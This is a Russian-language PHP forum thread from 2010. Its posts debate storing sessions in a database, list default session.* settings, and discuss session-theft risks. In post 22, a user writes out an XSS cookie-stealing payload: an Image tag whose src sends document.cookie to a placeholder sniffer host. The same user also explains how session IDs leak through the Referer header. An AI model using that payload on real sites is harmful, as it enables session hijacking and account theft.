Sessions in DB

1. Максим (13.08.2010 / 21:10)
Эт, чё хотел спросить, я вот в своём крупном проекте все сессии храню в базе данных, $_SESSION нет ни одной! Скажите реально узнать чейта session_id() ??? Да и вообще насколько всё это безопастно??? думал безопастно...)

2. Максим (13.08.2010 / 21:21)
Ээй... Чё, никто не юзал чтоли???

3. Максим (13.08.2010 / 21:28)
щас есть же проги которые сканят сайт и ***ят сессии, не помню как называется... мой project комм-го направления => надо думать о безопастности

4. Виталий (14.08.2010 / 23:44)
если все хорошо зделаеш то будет безопастно...какие проги?как ты себе ето представляэш?

5. Дмитрий (15.08.2010 / 01:26)
эм, извращение какое-то)

6. Славик (15.08.2010 / 01:45)
если все хранится в базе, то как скрипт опредиляет я зашел или вася?

7. Саня (15.08.2010 / 02:53)
Нормально будет, думаю значения не играет где ты данные хранишь, индификатор узнать ровно столько шансов, сколько если бы ты писал на сесия тоесть пока сам не упустишь

8. Максим (15.08.2010 / 09:39)
Ну ладно! Всем спасибо! А я переживал...

9. KOZZ (15.08.2010 / 10:40)
интересует вопрос из поста #6 ??

10. delete (15.08.2010 / 10:49)
БелладонН eGo (15 Августа 2010 / 10:40)
интересует вопрос из поста #6 ??
D ..просто если исходить из слов автора, это ни какая не особенность, так все хранят данные в базе smile а сессион как был так и будит.

11. KOZZ (15.08.2010 / 10:55)
10, ну автор вроде как утверждает что никаких сессий не юзает ($_SESSION нет ни одной!), интересно было бы послушать что он ответит))

12. Максим (15.08.2010 / 12:01)
не юзаю переменные $_SESSION. Всё хранится в бд.

<?php
session_name('SID');
session_start();
?>
и ишо несколько конфигов в .htaccess.

окромя этого ничего не упоминается

13. Максим (15.08.2010 / 12:03)
и к тому-же я не утверждал что это какаято особенность.

и не все хранят сесси в бд.

14. ramzes (15.08.2010 / 12:07)
автор, а зачем тебе это?
большей защиты все равно не добьешься

15. Максим (15.08.2010 / 12:11)
14. ramzes, мне так кажется удобней и проще у каждой сессии есть life_time - типа кукисов и тд... Мне так проще с данными работать, не знаю кому как. Решил "отречся" о с $_SESSION и $_COOKIES, которые не очистят...

16. ramzes (15.08.2010 / 12:45)
куки и сесии ты и сам можешь удалять.
родные методы быстрее, и если не ошибаюсь есть готовые решения в php для альтернативного хранения чтения и записи сессий хоть в файлы хоть в бд

17. Максим (15.08.2010 / 13:18)
мы пойдём другим путём...

18. DmitryDick (15.08.2010 / 13:24)
путем велосипедиста)

19. Максим (15.08.2010 / 13:27)
велосиппедов много всяких раэных, хороших, нормальных и безобразных...

20. ramzes (15.08.2010 / 13:39)
session.save_path""
session.name"PHPSESSID"
session.save_handler"files"
session.auto_start"0"
session.gc_probability"1"
session.gc_divisor"100"
Доступна с PHP 4.3.2.
session.gc_maxlifetime"1440"
session.serialize_handler"php"
session.cookie_lifetime"0"
session.cookie_path"/"
session.cookie_domain""
session.cookie_secure""

session.use_cookies"1"
session.use_only_cookies"0"
Доступна с PHP 4.3.0.
session.referer_check""
session.entropy_file""
session.entropy_length"0"
session.cache_limiter"nocache"
session.cache_expire"180"
session.use_trans_sid"0"
Доступна с PHP 4.0.3.
session.bug_compat_42"1"
Доступна с PHP 4.3.0.
session.bug_compat_warn"1"
Доступна с PHP 4.3.0.
session.hash_function"0"
Доступна с PHP 5.0.0.
session.hash_bits_per_character"4"
Доступна с PHP 5.0.0.
url_rewriter.tags"a=href,area=href,frame=src,form=,fieldset="

стандартный набор, думаешь стоит тратить время на написание стольких педалей к велосипеду?))

21. delete (15.08.2010 / 13:40)
да какая разница где ты сессию хранишь, от того что ты эти переменые не юзаеш, дополнительная уязвимость получается, что б украсть сессию надо найти пассивную xss, а уж потом попытаться снифером украсть куки, а в твоем случае надо лиш украсть страницу с куками smile это легче.. такой ж косяк у почты мейла, и у форума вена вроди, у фтп некоторых)))

22. delete (15.08.2010 / 13:52)
в случае с перемеными, найдя хss и вставив

<script>img = new Image(); img.src = "СНИФФЕР"+ document.cookie;</script>

куки улеят, но не у всех браузеров это вообще реально))) а вот в твоем случае достаточно getenv("HTTP_REFERER"); а это у всех сработает, даж дыры ненужны, только перешел на страницу, и усе, доступ у хацкера есть

23. delete (15.08.2010 / 13:57)
но если быть осторожным и не переходить на левые ссылки, то боятся нечего smile

URL: https://visavi.net/topics/12592